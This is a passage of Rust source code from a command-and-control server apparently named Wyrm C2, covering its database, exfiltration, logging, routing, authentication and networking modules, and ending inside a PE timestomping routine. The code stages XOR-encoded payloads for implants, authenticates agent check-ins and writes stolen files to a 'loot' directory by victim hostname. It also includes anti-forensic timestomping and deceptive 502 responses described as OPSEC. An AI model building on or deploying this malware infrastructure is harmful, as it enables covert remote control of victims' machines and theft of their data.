        .fetch_one(&self.pool)
        .await?;

        let file_name: String = results.get("pe_name");

        // Remove the agent staging row
        let _ = sqlx::query(
            "DELETE FROM agent_staging 
            WHERE staged_endpoint = $1",
        )
        .bind(download_url)
        .execute(&self.pool)
        .await?;

        Ok(file_name)
    }

    /// Queries the database to get URI information around routes available for agents where
    /// the operator has configured the C2 to use them, as well as staged downloads.
    ///
    /// # Returns
    /// On success returns a tuple:
    ///
    /// - `HashSet<String>` containing the URIs that are permitted for c2 check-in
    /// - `HashMap<String, String>` containing the URI's (key) and PE names (value) for staged downloads
    /// - `HashSet<String>` containing the security tokens valid for agents to connect to the C2
    pub async fn get_agent_related_db_cfg(
        &self,
    ) -> Result<
        (
            HashSet<String>,
            HashMap<String, DownloadEndpointData>,
            HashSet<String>,
        ),
        sqlx::Error,
    > {
        let mut check_in_uris: HashSet<String> = HashSet::new();
        let mut security_tokens: HashSet<String> = HashSet::new();
        let mut staged_downloads: HashMap<String, DownloadEndpointData> = HashMap::new();

        let rows = sqlx::query(
            r#"
            SELECT c2_endpoint, staged_endpoint, pe_name, security_token, agent_name, xor_key
            FROM agent_staging"#,
        )
        .fetch_all(&self.pool)
        .await?;

        if rows.is_empty() {
            return Ok((check_in_uris, staged_downloads, security_tokens));
        }

        for row in rows {
            let c2_endpoint: String = row.try_get("c2_endpoint")?;
            let staged_endpoint: String = row.try_get("staged_endpoint")?;
            let pe_name: String = row.try_get("pe_name")?;
            let agent_security_token: String = row.try_get("security_token")?;
            let agent_name: String = row.try_get("agent_name")?;
            let xor_key: Option<u8> = {
                let k: i16 = row.try_get("xor_key")?;
                // Cast is safe - we only ever accept a u8 on the frontend so we wont
                // experience any undefined behaviour in respect of integer underflow.
                if k == 0 { None } else { Some(k as u8) }
            };

            check_in_uris.insert(c2_endpoint);
            staged_downloads.insert(
                staged_endpoint,
                DownloadEndpointData::new(&pe_name, &agent_name, xor_key),
            );
            security_tokens.insert(agent_security_token);
        }

        Ok((check_in_uris, staged_downloads, security_tokens))
    }

    /// Attempts to lookup an operator - at the moment this only supports SINGLE OPERATOR operations
    /// so when we make the lookup, we are looking for 1 and only 1 row. We are NOT searching by username
    /// right now.
    ///
    /// # Returns
    /// Some - (`db_username`, `password_hash`, `salt`) of the row
    /// None - if the operator could not be found
    pub async fn lookup_operator(
        &self,
        _username: &str,
    ) -> Result<Option<(String, String, String)>, sqlx::Error> {
        let row = sqlx::query(
            r#"
            SELECT username, password_hash, salt
            FROM operators"#,
        )
        .fetch_one(&self.pool)
        .await?;

        if row.is_empty() {
            return Ok(None);
        }

        let db_username: String = row.try_get("username")?;
        let password_hash: String = row.try_get("password_hash")?;
        let salt: String = row.try_get("salt")?;

        Ok(Some((db_username, password_hash, salt)))
    }

    pub async fn add_operator(
        &self,
        username: &str,
        pw_hash: &str,
        salt_hash: &str,
    ) -> Result<(), sqlx::Error> {
        if let Ok(result) = self.lookup_operator("").await
            && result.is_some()
        {
            panic!("You are trying to add another operator and that is forbidden right now.");
        }

        let _ = sqlx::query(
            "INSERT into operators 
                (username, password_hash, salt)
            VALUES 
                ($1, $2, $3)
            ",
        )
        .bind(username)
        .bind(pw_hash)
        .bind(salt_hash)
        .execute(&self.pool)
        .await?;

        Ok(())
    }

    pub async fn get_staged_agent_data(&self) -> Result<Vec<StagedResourceData>, sqlx::Error> {
        let rows = sqlx::query_as::<_, StagedResourceData>(
            r#"
            SELECT agent_name, c2_endpoint, staged_endpoint, pe_name, sleep_time, port, num_downloads
            FROM agent_staging"#,
        )
        .fetch_all(&self.pool)
        .await?;

        Ok(rows)
    }

    pub async fn get_agent_export_data(&self, uid: &str) -> Result<Option<Vec<Task>>, sqlx::Error> {
        let rows = sqlx::query(
            r#"
            SELECT task_id, result, time_completed_ms, command_id
            FROM completed_tasks
            WHERE agent_id = $1"#,
        )
        .bind(uid)
        .fetch_all(&self.pool)
        .await?;

        if rows.is_empty() {
            return Ok(None);
        }

        let mut results = vec![];

        for row in rows {
            let task_id: i32 = row.try_get("task_id")?;
            let metadata: Option<String> = row.try_get("result")?;
            let completed_time: i64 = row.try_get("time_completed_ms")?;
            let command_id: i32 = row.try_get("command_id")?;

            let command = Command::from_u32(command_id as _);

            results.push(Task {
                id: task_id,
                command,
                completed_time,
                metadata,
            });
        }

        Ok(Some(results))
    }

    pub async fn update_download_count(&self, staged_endpoint: &String) -> Result<(), sqlx::Error> {
        let _ = sqlx::query(
            "UPDATE agent_staging
            SET num_downloads = num_downloads + 1
            WHERE staged_endpoint = $1",
        )
        .bind(staged_endpoint)
        .execute(&self.pool)
        .await?;

        Ok(())
    }
}


================================================
FILE: c2/src/exfil.rs
================================================
use std::path::PathBuf;

use shared::tasks::{ExfiltratedFile, Task};
use tokio::io::AsyncWriteExt;

use crate::{EXFIL_PATH, logging::log_error_async};

/// Handles an exfiltrated file from the targets machine by saving it to disk on the
/// c2 under the path c2/<hostname><path as per target machine>
pub async fn handle_exfiltrated_file(task: &mut Task) {
    task.metadata = None;
    return;

    if let Some(ser) = &task.metadata {
        let ef = match serde_json::from_str::<ExfiltratedFile>(ser) {
            Ok(ef) => ef,
            Err(e) => {
                // If we got an error extracting as an ExfiltratedFile, try extract as string which
                // will contain an error from the target system.
                if let Ok(_) = serde_json::from_str::<String>(ser) {
                    // Let the client deal with the error message
                    return;
                }

                log_error_async(&format!(
                    "Failed to deserialise data from exfiltrated file. {e}. Got: {:?}",
                    task.metadata
                ))
                .await;
                task.metadata = None;
                return;
            }
        };

        //
        // Construct the save path - we cannot save with C:\ in the name, so we strip this. Any other drive letter
        // should be fine (I think)
        //
        let mut save_path = String::from(EXFIL_PATH);
        save_path.push('/');
        save_path.push_str(&ef.hostname);
        save_path.push('/');
        save_path.push_str(&ef.file_path);
        let save_path = save_path.replace(r"C:\", "");
        let save_path = save_path.replace("\\", "/");

        //
        // Ensure the directory is created for the file
        //
        let mut path_as_path = PathBuf::from(&save_path);
        path_as_path.pop();
        if let Err(e) = tokio::fs::create_dir_all(path_as_path).await {
            log_error_async(&format!(
                "Failed to create folder for exfiltrated file. {e}"
            ))
            .await;
            task.metadata = None;
            return;
        };

        //
        // Create and write the file
        //
        let f = tokio::fs::File::options()
            .create(true)
            .write(true)
            .truncate(true)
            .open(&save_path)
            .await;

        let mut f = match f {
            Ok(f) => f,
            Err(e) => {
                log_error_async(&format!("Failed to create file after exfil. {e}")).await;

                task.metadata = None;
                return;
            }
        };

        if let Err(e) = f.write_all(&ef.file_data).await {
            log_error_async(&format!("Failed to write exfiltrated file data. {e}")).await;
        };
    }

    // Finally, remove the enclosed vec - we do not want to store this result in the db
    task.metadata = None;
}

/// Handles an exfiltrated file from the targets machine by saving it to disk on the
/// c2 under the path c2/<hostname><path as per target machine>
pub async fn handle_exfiltrated_file_stream(task: &mut Task) {
    if let Some(ser) = &task.metadata {
        let ef = match serde_json::from_str::<ExfiltratedFile>(ser) {
            Ok(ef) => ef,
            Err(e) => {
                // If we got an error extracting as an ExfiltratedFile, try extract as string which
                // will contain an error from the target system.
                if let Ok(_) = serde_json::from_str::<String>(ser) {
                    // Let the client deal with the error message
                    return;
                }

                log_error_async(&format!(
                    "Failed to deserialise data from exfiltrated file. {e}. Got: {:?}",
                    task.metadata
                ))
                .await;
                task.metadata = None;
                return;
            }
        };

        //
        // Construct the save path - we cannot save with C:\ in the name, so we strip this. Any other drive letter
        // should be fine (I think)
        //
        let mut save_path = String::from(EXFIL_PATH);
        save_path.push('/');
        save_path.push_str(&ef.hostname);
        save_path.push('/');
        save_path.push_str(&ef.file_path);
        let save_path = save_path.replace(r"C:\", "");
        let save_path = save_path.replace("\\", "/");

        //
        // Ensure the directory is created for the file
        //
        let mut path_as_path = PathBuf::from(&save_path);
        path_as_path.pop();
        if let Err(e) = tokio::fs::create_dir_all(path_as_path).await {
            log_error_async(&format!(
                "Failed to create folder for exfiltrated file. {e}"
            ))
            .await;
            task.metadata = None;
            return;
        };

        //
        // Create and write the file
        //
        let f = tokio::fs::File::options()
            .create(true)
            .write(true)
            .truncate(true)
            .open(&save_path)
            .await;

        let mut f = match f {
            Ok(f) => f,
            Err(e) => {
                log_error_async(&format!("Failed to create file after exfil. {e}")).await;

                task.metadata = None;
                return;
            }
        };

        if let Err(e) = f.write_all(&ef.file_data).await {
            log_error_async(&format!("Failed to write exfiltrated file data. {e}")).await;
        };
    }

    // Finally, remove the enclosed vec - we do not want to store this result in the db
    task.metadata = None;
}


================================================
FILE: c2/src/logging.rs
================================================
use std::{env, fmt::Display, io::Write, path::PathBuf};

use chrono::{SecondsFormat, Utc};
use tokio::io::AsyncWriteExt;

use crate::{ACCESS_LOG, DOWNLOAD, ERROR_LOG, LOG_PATH, LOGIN_LOG};

pub async fn log_download_accessed(uri: &str, addr: &str) {
    let mut path = PathBuf::from(LOG_PATH);
    path.push(DOWNLOAD);

    let msg = format!("Download accessed: /{uri}.");

    log(&path, &msg, Some(addr)).await;
}

pub async fn log_page_accessed_no_auth(uri: &str, addr: &str) {
    if let Ok(v) = env::var("DISABLE_ACCESS_LOG") {
        if v == "1" {
            return;
        }
    }

    let mut path = PathBuf::from(LOG_PATH);
    path.push(ACCESS_LOG);

    let msg = format!("Unauthenticated request at: /{uri}.");

    log(&path, &msg, Some(addr)).await;
}

pub async fn log_page_accessed_auth(uri: &str, addr: &str) {
    if let Ok(v) = env::var("DISABLE_ACCESS_LOG")
        && v == "1"
    {
        return;
    }

    let mut path = PathBuf::from(LOG_PATH);
    path.push(ACCESS_LOG);

    let msg = format!("Authenticated request at: /{uri}.");

    log(&path, &msg, Some(addr)).await;
}

pub async fn log_admin_login_attempt(username: &str, password: &str, ip: &str, success: bool) {
    if let Ok(v) = env::var("DISABLE_LOGIN_LOG")
        && v == "1"
    {
        return;
    }

    let mut path = PathBuf::from(LOG_PATH);
    path.push(LOGIN_LOG);

    // check if IP is unique, for size concerns only log those
    let r = tokio::fs::read_to_string(&path).await.unwrap_or_default();
    let msg = if r.contains(ip) && success {
        format!("Login true. Username: {username}, Password: [REDACTED].")
    } else if r.contains(ip) && !success {
        format!("[REPEAT ATTEMPT] Login {success}. Username: {username}, Password: REDACTED.")
    } else if !success {
        if let Ok(v) = env::var("DISABLE_PLAINTXT_PW_BAD_LOGIN") {
            if v == "1" {
                format!("Login {success}. Username: {username}, Password: [REDACTED].")
            } else {
                format!("Login {success}. Username: {username}, Password: {password}.")
            }
        } else {
            format!("Login {success}. Username: {username}, Password: {password}.")
        }
    } else {
        format!("Login {success}. Username: {username}, Password: [REDACTED].")
    };

    log(&path, &msg, Some(ip)).await;
}

pub fn log_error(message: &str) {
    let mut path = PathBuf::from(LOG_PATH);
    path.push(ERROR_LOG);

    log_sync(&path, message, None);
}

pub async fn log_error_async(message: &str) {
    let mut path = PathBuf::from(LOG_PATH);
    path.push(ERROR_LOG);

    log(&path, message, None).await
}

/// An internal function to log an event to a given log file.
///
/// This function takes care of adding the date and IP to the log for consistency, and also appends
/// a newline at the end of the line.
async fn log(path: &PathBuf, message: &str, addr: Option<&str>) {
    let file = tokio::fs::OpenOptions::new()
        .read(true)
        .append(true)
        .open(path)
        .await;

    let message = construct_msg(addr, message);

    if let Ok(mut file) = file {
        let _ = file.write(message.as_bytes()).await;
    }
}

fn log_sync(path: &PathBuf, message: &str, addr: Option<&str>) {
    let msg = construct_msg(addr, message);

    let file = std::fs::OpenOptions::new()
        .read(true)
        .append(true)
        .open(path);

    if let Ok(mut file) = file {
        let _ = file.write(msg.as_bytes());
    }
}

fn construct_msg(ip: Option<&str>, message: &str) -> String {
    let time_now = Utc::now();
    let time_now = time_now.to_rfc3339_opts(SecondsFormat::Secs, true);

    if let Some(ip) = ip {
        format!("[{time_now}] [{ip}] {message}\n")
    } else {
        format!("[{time_now}] {message}\n")
    }
}

#[macro_export]
macro_rules! ensure_log_file_on_disk {
    ($filename:expr) => {{
        use crate::LOG_PATH;

        let mut log_path = std::path::PathBuf::from(LOG_PATH);
        log_path.push($filename);
        if let Err(e) = std::fs::File::create_new(&log_path) {
            match e.kind() {
                std::io::ErrorKind::AlreadyExists => (),
                _ => {
                    panic!("Cannot create log for {}", $filename);
                }
            }
        }
    }};
}

#[macro_export]
macro_rules! create_dir {
    ($dir_path:expr) => {{
        if let Err(e) = std::fs::create_dir($dir_path) {
            match e.kind() {
                std::io::ErrorKind::AlreadyExists => (),
                _ => panic!("Could not create dir for {}", $dir_path),
            }
        }
    }};
}

pub fn print_success(msg: impl Display) {
    println!("[+] {msg}");
}

pub fn print_info(msg: impl Display) {
    println!("[i] {msg}");
}

pub fn print_failed(msg: impl Display) {
    println!("[-] {msg}");
}


================================================
FILE: c2/src/main.rs
================================================
#![feature(map_try_insert)]

use core::panic;
use std::{any::Any, net::SocketAddr, sync::Arc, time::Duration};

use axum::{
    Router,
    body::Bytes,
    extract::DefaultBodyLimit,
    http::{Response, StatusCode, header},
    middleware::from_fn_with_state,
    routing::{get, post},
    serve,
};

use http_body_util::Full;
use shared::net::{
    ADMIN_ENDPOINT, ADMIN_HEALTH_CHECK_ENDPOINT, ADMIN_LOGIN_ENDPOINT,
    NOTIFICATION_CHECK_AGENT_ENDPOINT,
};
use tower_http::catch_panic::CatchPanicLayer;

use crate::{
    api::{
        admin_routes::{
            admin_login, admin_upload, build_all_binaries_handler, handle_admin_commands_on_agent,
            handle_admin_commands_without_agent, is_adm_logged_in, logout,
            poll_agent_notifications,
        },
        agent_get::{handle_agent_get, handle_agent_get_with_path},
        agent_post::{agent_post_handler, agent_post_handler_with_path},
    },
    app_state::{AppState, detect_stale_agents},
    db::Db,
    logging::{log_error, print_info, print_success},
    middleware::{authenticate_admin, authenticate_agent_by_header_token, logout_middleware},
    profiles::parse_profile,
};

mod admin_task_dispatch;
mod agents;
mod api;
mod app_state;
mod db;
mod exfil;
mod logging;
mod middleware;
mod net;
mod pe_utils;
mod profiles;

/// The maximum POST body request size that can be received by the C2.
/// Set at 1 GB.
const NUM_GIGS: usize = 100;
const MAX_POST_BODY_SZ: usize = NUM_GIGS * 1024 * 1024 * 1024;

const AUTH_COOKIE_NAME: &str = "session";
const COOKIE_TTL: Duration = Duration::from_hours(12);

/// The path to the directory on the server (relative to the working directory of the service [n.b. this
/// implies the server was 'installed' correctly..])
const FILE_STORE_PATH: &str = "/data/staged_files";
const EXFIL_PATH: &str = "/data/loot";
const LOG_PATH: &str = "/data/logs";
const DB_EXPORT_PATH: &str = "/data/exports";
const ACCESS_LOG: &str = "access.log";
const DOWNLOAD: &str = "downloads.log";
const LOGIN_LOG: &str = "login.log";
const ERROR_LOG: &str = "error.log";
const TOOLS_PATH: &str = "/tools";
const WOFS_PATH: &str = "/wofs_static";

#[tokio::main]
async fn main() -> Result<(), Box<dyn std::error::Error>> {
    //
    // Initialise the state of the C2, including checking the filesystem, database, etc.
    //
    let state = init_server_state().await;

    //
    // Build the router and serve content
    //
    let app = build_routes(state.clone()).layer(CatchPanicLayer::custom(handle_panic));
    let listener = tokio::net::TcpListener::bind(construct_listener_addr()).await?;

    print_success(format!(
        "Wyrm C2 started on: {}",
        listener.local_addr().unwrap()
    ));

    serve(
        listener,
        app.into_make_service_with_connect_info::<SocketAddr>(),
    )
    .await?;

    print_info("Server closed.");

    Ok(())
}

fn construct_listener_addr() -> String {
    let port = std::env::var("C2_PORT").expect("could not find C2_PORT environment variable");
    let port: u16 = port
        .parse()
        .expect("could not parse port number to valid range");
    let c2_host = std::env::var("C2_HOST").expect("could not find C2_HOST environment variable");

    format!("{c2_host}:{port}")
}

async fn init_server_state() -> Arc<AppState> {
    print_info("Starting Wyrm C2.");

    let profile = match parse_profile().await {
        Ok(p) => p,
        Err(e) => {
            panic!("Could not parse profiles. {e}");
        }
    };

    print_success("Profiles parsed.");

    ensure_dirs_and_files();

    let pool = Db::new().await;
    let state = Arc::new(AppState::from(pool, profile).await);

    //
    // Kick off automations that run on the server
    //
    state.track_sessions();
    let state_cl = state.clone();
    tokio::task::spawn(async move { detect_stale_agents(state_cl).await });

    state
}

fn build_routes(state: Arc<AppState>) -> Router {
    Router::new()
        //
        //
        // PUBLIC ROUTES
        //
        //
        .route(
            "/",
            get(handle_agent_get).layer(from_fn_with_state(
                state.clone(),
                authenticate_agent_by_header_token,
            )),
        )
        .route(
            "/",
            post(agent_post_handler).layer(from_fn_with_state(
                state.clone(),
                authenticate_agent_by_header_token,
            )),
        )
        // Used for the operator staging payloads or check-ins not to /
        .route(
            "/{*endpoint}",
            get(handle_agent_get_with_path).layer(from_fn_with_state(
                state.clone(),
                authenticate_agent_by_header_token,
            )),
        )
        .route(
            "/{*endpoint}",
            post(agent_post_handler_with_path).layer(from_fn_with_state(
                state.clone(),
                authenticate_agent_by_header_token,
            )),
        )
        //
        //
        // ADMIN ROUTES
        //
        //
        .route(
            "/logout_admin",
            post(logout).layer(from_fn_with_state(state.clone(), logout_middleware)),
        )
        // Uploading a file via the GUI
        .route(
            "/admin_upload",
            post(admin_upload).layer(from_fn_with_state(state.clone(), authenticate_admin)),
        )
        // Build all binaries path
        .route(
            "/admin_bab",
            post(build_all_binaries_handler)
                .layer(from_fn_with_state(state.clone(), authenticate_admin)),
        )
        .route(&format!("/{ADMIN_LOGIN_ENDPOINT}"), post(admin_login))
        // Admin endpoint when operating a command which is not related to a specific agent
        .route(
            &format!("/{ADMIN_ENDPOINT}"),
            post(handle_admin_commands_without_agent)
                .layer(from_fn_with_state(state.clone(), authenticate_admin)),
        )
        // Against a specific agent
        .route(
            &format!("/{ADMIN_ENDPOINT}/{}", "{id}"),
            post(handle_admin_commands_on_agent)
                .layer(from_fn_with_state(state.clone(), authenticate_admin)),
        )
        // For checking if notifications exist for a given agent
        .route(
            &format!("/{NOTIFICATION_CHECK_AGENT_ENDPOINT}/{}", "{id}"),
            get(poll_agent_notifications)
                .layer(from_fn_with_state(state.clone(), authenticate_admin)),
        )
        // A route for admin poll to check if logged in on the GUI
        .route(
            ADMIN_HEALTH_CHECK_ENDPOINT,
            get(is_adm_logged_in).layer(from_fn_with_state(state.clone(), authenticate_admin)),
        )
        //
        // 1 GB for POST max ?
        //
        .layer(DefaultBodyLimit::max(MAX_POST_BODY_SZ))
        .with_state(state.clone())
}

fn ensure_dirs_and_files() {
    create_dir!(FILE_STORE_PATH);
    create_dir!(DB_EXPORT_PATH);
    create_dir!(EXFIL_PATH);
    create_dir!(LOG_PATH);

    ensure_log_file_on_disk!(ACCESS_LOG);
    ensure_log_file_on_disk!(DOWNLOAD);
    ensure_log_file_on_disk!(LOGIN_LOG);
    ensure_log_file_on_disk!(ERROR_LOG);

    print_success("Directories and files are in order..");
}

fn handle_panic(err: Box<dyn Any + Send + 'static>) -> Response<Full<Bytes>> {
    let details = if let Some(s) = err.downcast_ref::<String>() {
        s.clone()
    } else if let Some(s) = err.downcast_ref::<&str>() {
        s.to_string()
    } else {
        "Unknown panic message".to_string()
    };

    log_error(&format!("PANIC: `{}`", details));

    let body = serde_json::json!("");

    let body = serde_json::to_string(&body).unwrap();
    Response::builder()
        .status(StatusCode::INTERNAL_SERVER_ERROR)
        .header(header::CONTENT_TYPE, "application/json")
        .body(Full::from(body))
        .unwrap()
}


================================================
FILE: c2/src/middleware.rs
================================================
use std::{net::SocketAddr, sync::Arc, time::Instant};

use axum::{
    extract::{ConnectInfo, Request, State},
    http::{HeaderMap, StatusCode},
    middleware::Next,
    response::IntoResponse,
};
use axum_extra::extract::CookieJar;
use base64::{Engine, engine::general_purpose};
use crypto::bcrypt::bcrypt;
use rand::{RngCore, rng};

use crate::{
    AUTH_COOKIE_NAME,
    app_state::AppState,
    logging::{log_download_accessed, log_error_async, log_page_accessed_no_auth},
};

const BCRYPT_HASH_BYTES: usize = 24;
const BCRYPT_COST: u32 = 12;
const SALT_BYTES: usize = 16;
const LOCK_WAIT_WARN_MS: u128 = 500;

/// Authenticates access to an admin route via the `Authorization` header present with the request. This includes
/// encoded username/password which will be validated.
///
/// In the event there is no user in the db, a new one will be created. We make this secure by requiring a third
/// parameter sent in the headers which is a unique token set in the `.env` of the server to ensure we cannot be
/// vulnerable to remote takeover.
pub async fn authenticate_admin(
    jar: CookieJar,
    State(state): State<Arc<AppState>>,
    addr: ConnectInfo<SocketAddr>,
    request: Request,
    next: Next,
) -> impl IntoResponse {
    if let Some(session) = jar.get(AUTH_COOKIE_NAME) {
        let session = session.to_string();

        //
        // Determine whether the presented session key is present in the active keys
        //
        if state.has_session(&session).await {
            return next.run(request).await.into_response();
        } else {
            return StatusCode::NOT_FOUND.into_response();
        }
    }

    return StatusCode::NOT_FOUND.into_response();
}

/// Verify the password passed into the admin route by comparing its calculated hash with the
/// expected hash from the db.
pub async fn verify_password(password: &str, password_hash: &str, salt: &str) -> bool {
    let salt = general_purpose::STANDARD
        .decode(salt)
        .expect("invalid base64");

    let expected_hash = general_purpose::STANDARD
        .decode(password_hash)
        .expect("invalid b64 on password");

    let password = password.to_string();

    // Validate with bcrypt on same salt
    let computed_hash: Vec<u8> = tokio::task::spawn_blocking(move || {
        let mut h = [0u8; BCRYPT_HASH_BYTES];
        bcrypt(BCRYPT_COST, &salt, password.as_bytes(), &mut h);
        h.to_vec()
    })
    .await
    .expect("bcrypt task panicked");

    computed_hash == expected_hash
}

/// Create a new operator in the database, taking in a plaintext password and hashing it with BCrypt
/// and a random salt.
///
/// The hashed password will be stored in the database, **not** the plaintext version.
pub async fn create_new_operator(username: &str, password: &str, state: Arc<AppState>) {
    let mut salt = [0u8; SALT_BYTES];
    rng().fill_bytes(&mut salt);

    let salt_clone = salt.to_vec();
    let password = password.to_string();

    let computed_hash = tokio::task::spawn_blocking(move || {
        let mut hash_output = [0u8; BCRYPT_HASH_BYTES];
        bcrypt(
            BCRYPT_COST,
            &salt_clone,
            password.as_bytes(),
            &mut hash_output,
        );

        hash_output.to_vec()
    })
    .await
    .expect("Could not compute hash in create_new_operator");

    let salt_b64 = general_purpose::STANDARD.encode(salt);
    let hash_b64 = general_purpose::STANDARD.encode(&computed_hash);

    state
        .db_pool
        .add_operator(username, &hash_b64, &salt_b64)
        .await
        .unwrap();
}

/// Authenticates an agent based on a header: `Authorization`. The agent will carry a security token which
/// was set by the operator so that we can verify the inbound connection DOES in fact relate to an agent under
/// our control.
///
/// This will reduce the attack surface of API's close to the database, and reduce the likelihood of a DDOS due to
/// batting the request off before we actually deal with it past middleware.
///
/// If the checks fail, a BAD_GATEWAY status will be returned, which may be a little more OPSEC savvy in that it may
/// throw off analysis thinking the server is down, whereas a 404 may indicate the server is active.
pub async fn authenticate_agent_by_header_token(
    State(state): State<Arc<AppState>>,
    addr: ConnectInfo<SocketAddr>,
    headers: HeaderMap,
    request: Request,
    next: Next,
) -> impl IntoResponse {
    let ip = if let Some(h) = headers.get("X-Forwarded-For") {
        h.to_str().unwrap_or("Not Found")
    } else {
        "Not found"
    };

    //
    // First, we need to check whether the request is going to a URI in which a download is staged
    // as we do not want to gate keep that as requiring the Auth header.
    //

    let uri = request.uri().to_string();
    let uri = &uri[1..];
    let endpoints_lock_start = Instant::now();
    let is_download = {
        let lock = state.endpoints.read().await;
        lock.download_endpoints.contains_key(uri)
    };
    let endpoints_lock_wait_ms = endpoints_lock_start.elapsed().as_millis();
    if endpoints_lock_wait_ms > LOCK_WAIT_WARN_MS {
        log_error_async(&format!(
            "Slow endpoints read lock: {endpoints_lock_wait_ms}ms for uri {uri} from {ip}"
        ))
        .await;
    }

    if is_download {
        log_download_accessed(uri, ip).await;
        return next.run(request).await.into_response();
    }

    //
    // That URI wasn't requested, therefore we want to apply our auth check.
    //

    let h = match request.headers().get("authorization") {
        Some(h) => h,
        None => {
            log_page_accessed_no_auth(uri, ip).await;
            return StatusCode::BAD_GATEWAY.into_response();
        }
    };

    let auth_header = match h.to_str() {
        Ok(head) => head,
        Err(_) => {
            log_page_accessed_no_auth(uri, ip).await;
            return StatusCode::BAD_GATEWAY.into_response();
        }
    };

    let tokens_lock_start = Instant::now();
    let has_token = {
        let lock = state.agent_tokens.read().await;
        lock.contains(auth_header)
    };

    let tokens_lock_wait_ms = tokens_lock_start.elapsed().as_millis();
    if tokens_lock_wait_ms > LOCK_WAIT_WARN_MS {
        log_error_async(&format!(
            "Slow agent_tokens read lock: {tokens_lock_wait_ms}ms for uri {uri} from {ip}"
        ))
        .await;
    }

    if has_token {
        // The happy path, token present
        // log_page_accessed_auth(uri, ip).await;
        return next.run(request).await.into_response();
    }

    // The unhappy path
    log_page_accessed_no_auth(uri, ip).await;
    StatusCode::BAD_GATEWAY.into_response()
}

pub async fn logout_middleware(
    jar: CookieJar,
    State(state): State<Arc<AppState>>,
    request: Request,
    next: Next,
) -> impl IntoResponse {
    if let Some(session) = jar.get(AUTH_COOKIE_NAME) {
        let session = session.to_string();

        state.remove_session(&session).await;
        return next.run(request).await.into_response();
    }

    return StatusCode::NOT_FOUND.into_response();
}


================================================
FILE: c2/src/net.rs
================================================
//! Module relating to functionality over the wire, such as transformation of data in transit

use axum::{
    body::Body,
    http::{
        HeaderValue, StatusCode,
        header::{CONTENT_DISPOSITION, CONTENT_TYPE},
    },
    response::{IntoResponse, Response},
};
use futures::StreamExt;
use shared::{
    net::{TasksNetworkStream, XorEncode, encode_u16buf_to_u8buf},
    tasks::{Command, Task},
};
use std::path::PathBuf;
use tokio_util::io::ReaderStream;

use crate::{FILE_STORE_PATH, logging::log_error_async};

/// Serialises pending tasks to be sent over the wire to be consumed by the agent.
///
/// # Returns
/// If the input task is `None`, the function will serialise a Sleep command in the correct
/// format for the agent. Otherwise, it will serialise every task into a valid serde json
/// byte vector, and return that.
pub async fn serialise_tasks_for_agent(tasks: Option<Vec<Task>>) -> Vec<u8> {
    let mut responses: TasksNetworkStream = Vec::new();

    let tasks: Vec<Task> = match tasks {
        Some(tasks) => tasks,
        None => {
            let raw = prepare_response_packet(Task {
                id: 0,
                command: Command::Sleep,
                metadata: None,
                completed_time: 0,
            })
            .await
            .xor_network_stream();
            responses.push(raw);
            return serde_json::to_vec(&responses).unwrap();
        }
    };

    for task in tasks {
        let raw = prepare_response_packet(task).await.xor_network_stream();
        responses.push(raw)
    }

    serde_json::to_vec(&responses).unwrap()
}

async fn prepare_response_packet(task: Task) -> Vec<u8> {
    let mut packet = from_task_id_bytes(task.id);

    let (low, high) = task.command.to_u16_tuple_le();
    packet.push(low);
    packet.push(high);

    // insert sizeof i64 of zeros for the completed time, packet is u16 len so we need 4
    packet.push(0);
    packet.push(0);
    packet.push(0);
    packet.push(0);

    if task.metadata.is_none() {
        return encode_u16buf_to_u8buf(&packet);
    }

    // Now encode in the metadata
    let data = task.metadata.unwrap();
    let mut data_bytes: Vec<u16> = data.encode_utf16().collect();

    packet.append(&mut data_bytes);

    encode_u16buf_to_u8buf(&packet)
}

fn from_task_id_bytes(id: i32) -> Vec<u16> {
    let id_bytes = id.to_le_bytes();
    let low = u16::from_le_bytes([id_bytes[0], id_bytes[1]]);
    let high = u16::from_le_bytes([id_bytes[2], id_bytes[3]]);

    vec![low, high]
}

/// Serves a file from the local disk by its file name. The server will look in the
/// ../staged_files/ dir for the relevant file.
pub async fn serve_file(filename: &String, xor_key: Option<u8>) -> Response {
    let mut path = PathBuf::from(FILE_STORE_PATH);
    path.push(filename);

    let file = match tokio::fs::File::open(path).await {
        Ok(f) => f,
        Err(e) => {
            log_error_async(&format!("Failed to read file. {e}")).await;
            return StatusCode::BAD_GATEWAY.into_response();
        }
    };

    let stream = ReaderStream::new(file);

    // Serve XOR'ed bytes if the file was staged as XOR payload
    let body = if let Some(key) = xor_key {
        let xor_stream = stream.map(move |chunk| {
            chunk.map(|bytes| {
                let mut data: Vec<u8> = bytes.to_vec();
                for byte in data.iter_mut() {
                    *byte ^= key;
                }
                axum::body::Bytes::from(data)
            })
        });
        Body::from_stream(xor_stream)
    } else {
        Body::from_stream(stream)
    };

    Response::builder()
        .status(StatusCode::OK)
        .header(
            CONTENT_TYPE,
            HeaderValue::from_static("application/octet-stream"),
        )
        .header(
            CONTENT_DISPOSITION,
            HeaderValue::from_str(&format!("inline; filename=\"{filename}\"")).unwrap(),
        )
        .body(body)
        .unwrap()
}


================================================
FILE: c2/src/pe_utils/mod.rs
================================================
use std::{io::SeekFrom, path::Path};

use chrono::NaiveDateTime;
use thiserror::Error;
use tokio::{
    fs::{File, OpenOptions},
    io::{AsyncReadExt, AsyncSeekExt, AsyncWriteExt},
};

use crate::{
    logging::log_error_async,
    pe_utils::types::{IMAGE_DOS_HEADER, IMAGE_NT_HEADERS64},
};

mod types;

#[derive(Error, Debug)]
pub enum PeScrubError {
    #[error("unable to open file, {0}")]
    FileOpen(String),
    #[error("unable to read buffer from file object, {0}")]
    FileRead(String),
    #[error("did not match on magic bytes, got: {0}")]
    MagicBytesMZ(u16),
    #[error("could not read file content, but not a file read error..")]
    NoRead,
    #[error("datetime was not formatted correctly, must be british formatting - %d/%m/%Y %H:%M:%S")]
    DTMismatch,
    #[error("Circuit breaker hit in loop")]
    CircuitBreaker,
    #[error("the buffer was too small")]
    BuffTooSmall,
    #[error("could not write to file, {0}")]
    FileWriteError(String),
}

/// Timestomps the compiled time of a given PE.
///
/// # Args
/// - `dt_str`: The datetime in British format for the binary to have in its compiled time headers.
/// - `build_path`: The path to the file to timestomp on disk.
///
/// # Returns
/// The function only returns meaningful data on error, being [`TimestompError`]. On success nothing is returned,
/// the original file is modified in place.
pub async fn timestomp_binary_compile_date(
    dt_str: &str,
    build_path: &Path,
) -> Result<(), PeScrubError> {
    let mut file = OpenOptions::new()
        .read(true)
        .write(true)
        .open(build_path)
        .await
        .map_err(|e| PeScrubError::FileOpen(e.to_string()))?;

    //
    // Read the first 2 kb of the binary into our buffer and grab the e_lfanew so we can offset to the
    // TimeDateStamp field
    //
